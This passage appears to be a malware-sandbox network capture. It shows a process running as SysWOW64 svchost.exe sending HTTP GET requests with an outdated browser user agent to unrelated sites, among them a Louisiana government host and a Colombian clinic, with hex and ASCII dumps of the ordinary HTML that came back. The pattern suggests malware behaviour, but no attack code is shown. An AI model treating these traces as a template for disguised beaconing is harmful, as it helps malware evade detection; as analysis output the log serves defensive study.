                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2642INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2658INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                                                        Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2674INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC2690INData Raw: 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 63 61 73 65 2f 77 6f 72 6b 73 2f 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 68 74 6d 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 61 67 65 73 2f 74 6f 70 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 69 6d 61 67 65 36 2e 70 6e 67 22 20 61 6c 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 63 6f 6e 74 65 6e 74 22 3e e9 9b 86 e5 90 88 e4 bd 8f e5 ae 85 3c 62 72 3e e6 b6 88 e9 98 b2 e8 a8 ad e5 82 99 e7 82 b9
                                                                                                                                                                                                                                                                                        Data Ascii: 4"> <a href="case/works/maintenance.html"> <div class="top-performance-inner"><img src="./images/top/performance-image6.png" alt=""> <p class="top-performance-content"><br>


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        5192.168.2.35189775.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: ldh.la.gov
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC76INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:51 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 1346
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC76INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        6192.168.2.358441172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC34OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:53 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Set-Cookie: d55e479f054c94814cbc10d217aaa990=d4f211e639d02635126660b33c53cbbe; path=/; HttpOnly
                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 31 May 2023 12:51:53 GMT
                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K6eskj13jiyTjknwGxsaALf1g%2FQ6XPcMRvVfTyCb6oXOxgNed6ju5mK4mVZwIYiVOMuXKfQ%2BNMdOlCDeSGwaa3ZYFmcRe88nlkgRAVKSB63FqXerhprRFgv%2FMiK1aXbIqPL%2F5xNYeKA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 7cff59c709fa046e-FRA
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC130INData Raw: 37 63 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: 7c4e<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC130INData Raw: 6f 6b 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f
                                                                                                                                                                                                                                                                                        Data Ascii: okbox/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/engines/
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC131INData Raw: 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f
                                                                                                                                                                                                                                                                                        Data Ascii: 989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC133INData Raw: 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20
                                                                                                                                                                                                                                                                                        Data Ascii: min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC134INData Raw: 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20
                                                                                                                                                                                                                                                                                        Data Ascii: ng" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC135INData Raw: 6e 75 70 61 72 65 6e 74 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65
                                                                                                                                                                                                                                                                                        Data Ascii: nuparent><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-me
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC137INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                                        Data Ascii: menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC138INData Raw: 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69
                                                                                                                                                                                                                                                                                        Data Ascii: ><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clini
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC139INData Raw: 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: -clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li c
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC141INData Raw: 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63
                                                                                                                                                                                                                                                                                        Data Ascii: -item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donac
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:53 UTC142INData Raw: 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c
                                                                                                                                                                                                                                                                                        Data Ascii: /span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span><
